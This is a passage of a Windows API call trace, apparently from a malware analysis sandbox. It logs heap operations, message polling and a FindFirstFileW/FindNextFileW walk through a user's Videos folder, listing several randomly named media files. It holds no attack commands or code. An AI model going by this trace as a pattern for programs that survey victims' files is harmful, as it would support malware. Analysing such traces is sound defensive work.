lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f6ee0 [0212.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f6ee0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a74cc0 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0212.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0212.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a71b38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0212.173] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0212.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.174] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0212.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.175] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a1db1fd, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a1db1fd, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e1db8 [0212.175] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a1db1fd, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a1db1fd, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0212.175] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdabc6600, ftCreationTime.dwHighDateTime=0x1d5d569, ftLastAccessTime.dwLowDateTime=0x9a905450, ftLastAccessTime.dwHighDateTime=0x1d5d259, ftLastWriteTime.dwLowDateTime=0x9a905450, ftLastWriteTime.dwHighDateTime=0x1d5d259, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="A5YVihV.avi", cAlternateFileName="")) returned 1 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.175] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.175] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0212.176] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.176] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.177] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.177] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.177] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.177] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.178] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27878a60, ftCreationTime.dwHighDateTime=0x1d5cb64, ftLastAccessTime.dwLowDateTime=0x97abe6e0, ftLastAccessTime.dwHighDateTime=0x1d5d2fa, ftLastWriteTime.dwLowDateTime=0x97abe6e0, ftLastWriteTime.dwHighDateTime=0x1d5d2fa, nFileSizeHigh=0x0, nFileSizeLow=0x4673, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="CBK9.flv", cAlternateFileName="")) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.178] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.178] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0212.178] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0212.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.186] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.186] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.186] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf59c0, ftCreationTime.dwHighDateTime=0x1d5cff7, ftLastAccessTime.dwLowDateTime=0xc30b7b30, ftLastAccessTime.dwHighDateTime=0x1d5d0e7, ftLastWriteTime.dwLowDateTime=0xc30b7b30, ftLastWriteTime.dwHighDateTime=0x1d5d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x1770b, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="dbFeToW6SZRYrK03.flv", cAlternateFileName="DBFETO~1.FLV")) returned 1 [0212.186] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.186] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.186] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6658ee30, ftCreationTime.dwHighDateTime=0x1d5ccec, ftLastAccessTime.dwLowDateTime=0xddbbbdd0, ftLastAccessTime.dwHighDateTime=0x1d5d1fc, ftLastWriteTime.dwLowDateTime=0xddbbbdd0, ftLastWriteTime.dwHighDateTime=0x1d5d1fc, nFileSizeHigh=0x0, nFileSizeLow=0x131b0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="kmyLNxqbxySO-S_H2O9.mp4", cAlternateFileName="KMYLNX~1.MP4")) returned 1 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.187] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, 